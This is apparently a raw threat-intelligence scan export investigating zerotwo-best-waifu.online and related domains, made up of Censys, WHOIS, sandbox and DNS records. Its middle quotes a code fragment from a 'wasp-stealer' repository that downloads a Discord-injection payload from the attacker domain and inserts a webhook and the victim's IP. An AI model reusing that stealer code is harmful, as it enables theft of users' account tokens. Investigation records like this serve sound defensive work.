{"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76470ba428ad72d6-LHR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Raccourcis personnalis\xe9s dans After Effects', u'time': 
u'2022-11-03T18:06:43.4444222Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731cbe0777147f6cea56397bac2a1a8fa1190649ae935739aeb', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'0', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.nonsvooquaca.tk', u'nonsvooquaca.tk'], u'cn': u'*.nonsvooquaca.tk', u'valid': True, u'not_after': u'2022-12-04T16:09:49Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'e62909e741efb1675526c76576ee45a0c99211c3675384247145be7582595e79', u'key_algo': u'ECDSA', u'not_before': u'2022-09-05T16:09:50Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'nonsvooquaca.tk', u'summary': u'Date: Thu, 03 Nov 2022 16:49:11 
GMT\r\nContent-Length: 0\r\nConnection: close\r\nCache-Control: no-store, no-cache\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gbVcWHatvP07pS8%2BtPzgz0E1dXupaSMloKHp3%2B3iQLFkvhvuk8fMlloPTWSOo9pZv8%2B5i5LQ8k%2BY7AZt2MQ3TjjAUmZVTTGvdcbVfWeq01S11Y1F29bvH%2Bh63iu%2B8TvVkz4%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76469a0a1d91dcb7-LHR\r\nalt-svc: h3=":8443"; ma=86400, h3-29=":8443"; ma=86400\r\n\n\n', u'time': u'2022-11-03T16:49:09.75743523Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b932f45e5a9fa5e6523b', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Best Ardooie Belgium gay dating site', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', 
u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'drawasbasmamis.ml', u'summary': u'Date: Wed, 02 Nov 2022 07:40:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sFm4jrNPbXGalRr%2FtQAxfY6IMOLWllOsvyD8uB2KZGM7KlwCdrYDveX2XR42ydLOxLlrj7oHSD%2BV1EI2tT41hJEiK2CxU%2FihywC1S6SnHTPPW%2FfRxOo25NlYo%2FhOw9nuZYg4zA%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 763b3874de5edd7c-LHR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Best Ardooie Belgium gay dating site', u'time': u'2022-11-02T07:40:10.302455138Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc680132cf2d96aa19bf39cc2bf7', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': 
u'https://www.m6a5893.com', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'm6a5893.com', u'*.m6a5893.com', u'sni.cloudflaressl.com'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-05-21T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'f9a105c5f311f952cf18e79b230288f10c89fabbad4478c1fec60a4bee2e3a2b', u'key_algo': u'ECDSA', u'not_before': u'2022-05-21T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'm6a5893.com', u'summary': u'Date: Wed, 02 Nov 2022 02:35:44 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Wed, 02 Nov 2022 03:35:44 GMT\r\nLocation: https://www.m6a5893.com\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=rwVkI9%2FRm5Yu8mCFhR8rCy0WnQ%2F8rTIeX5ZoMDQIP6P6LqpQUgKAcXceLPnV0mFuPKWTjgoaXCjTVhxOGb6AMnn507c1VwDSgnHM5KLf2IIyyeTWSDyUz3j5o%2FlGOQ%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY 172.67.137.37 2022-12-18 00:21:47 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3032::ac43:8925:443 2606:4700:3032::ac43:8925 2022-12-18 00:21:51 Open TCP Port No Censys 0 0 2 0 None 172.67.137.37:8443 172.67.137.37 2022-12-18 00:02:44 Internet Name - Unresolved No grep.app 0 0 1 0 None atlas.plague.fun plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No 
Wigle.net 0 0 5 0 None 55 2nd PMO (Net ID: 00:01:21:10:61:00) 37.780462,-122.390564 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77acb0e2eabe2243-ORD Content-Encoding: gzip 172.67.147.230 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2083 188.114.97.1 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 4 0 3 0 None http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 http://webmail.zerotwo-best-waifu.online/ 2022-12-18 00:09:23 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None zerotwo-best-wa.ifu.online zerotwo-best-waifu.online 2022-12-18 00:11:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 
188.114.97.1 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77a7df6a3f6b13ec-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:24:59 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.192 90.116.149.183 2022-12-18 00:07:01 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://2.inicio12.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar10CC.tmp" as clean (type is "data")'}, 
{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.250.191.42:443"\n "142.250.191.35:80"\n "142.250.189.163:443"\n "184.31.203.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"2.inicio12.repl.co"\n "ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fb0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fb0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fb0_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fb0_ConnHashTable<4016>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4016"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_fb0_IE_EarlyTabStart_0xd50_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_fb0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4016"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary 
File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "SICQQ4HU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SICQQ4HU.txt]- [targetUID: 00000000-00004016]\n Dropped file: "VKBQUO1X.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VKBQUO1X.txt]- [targetUID: 00000000-00004016]\n Dropped file: "QK4AWN5G.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QK4AWN5G.txt]- [targetUID: 00000000-00004016]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "Cab10CB.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004016]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 
00000000-00000320]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00000320]\n "6AC0056FF89500E2DC9650C3F49FB905" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6AC0056FF89500E2DC9650C3F49FB905]- [targetUID: 00000000-00000320]\n "SICQQ4HU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SICQQ4HU.txt]- [targetUID: 00000000-00004016]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3]- [targetUID: 00000000-00000320]\n "265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84]- [targetUID: 00000000-00000320]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00004016]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00004016]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- 
Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000320]\n "_2C16291F-4B07-11ED-AB07-080027AC508C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00000320]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFB264EBDB98B9664.TMP" has type "data"- Location: [%TEMP%\\~DFFB264EBDB98B9664.TMP]- [targetUID: 00000000-00004016]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://2.inicio12.repl.co/"\n Pattern match: "https://2.inicio12.repl.co"\n Heuristic match: "2.inicio12.repl.co"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 2.inicio12.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "@media (max-width: 500px) {\n .message {\n flex-direction: column;\n align-items: 
center;\n }\n }\n\n .eval-bot {\n margin: 4em;\n }\n\n .console {\n background-color: #0e1628;\n color: #fff;\n font-family: "IBM Plex Sans", "sans";\n padding: 1em;\n margin: 1em;\n }\n\n .footer-item {\n margin: 1em;\n display: flex;\n justify-content: center;\n align-items: center;\n }\n\n .link-icon {\n margin-right: 8px;\n margin-top: 4px;\n }\n\n a {\n color: #c2c8cc;\n }\n \n\n \n \n\n \n
os.makedirs(path+"\\\\W4SPStealer")
paylaod = urlopen("http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection").read().decode("utf8").replace("%WEBHOOK%",hook).replace("%IP%",f"{getip()}")
'}, u'branch': {u'raw': u'main'}, u'path': {u'raw': u'OldWaspsVersions/wasp-1.1.1.py'}, u'id': {u'raw': u'g/aceeontop/wasp-stealer/main/OldWaspsVersions/wasp-1.1.1.py'}, u'owner_id': {u'raw': u'89152258'}} zerotwo-best-waifu.online 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:80 188.114.96.0 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None stream.plague.fun plague.fun 2022-12-18 00:23:30 Affiliate - Internet Name No DNS Raw Records 1 0 2 0 None tb-fr.securemail.pro autoconfig.zerotwo-best-waifu.online 2022-12-18 00:31:04 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-20T06:18:36Z Creation Date: 2020-04-14T23:55:11Z Registry Expiry Date: 2023-04-14T23:55:11Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. 
The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. 
Domain name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-15T06:18:37.01Z Creation Date: 2020-04-14T23:55:11.78Z Registrar Registration Expiration Date: 2023-04-14T23:55:11.78Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T12:31:04.11Z <<< For more information on Whois status codes, please visit https://icann.org/epp plague.club
2022-12-18 00:16:27 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.96.9:443 188.114.96.9
2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37
2022-12-18 00:18:25 IP Address No DNS Resolver 0 0 2 0 None 81.88.52.232 ftp.zerotwo-best-waifu.online
2022-12-18 00:03:05 Domain Name No DNS Resolver 0 0 1 0 None zerotwo-best-waifu.online zerotwo-best-waifu.online
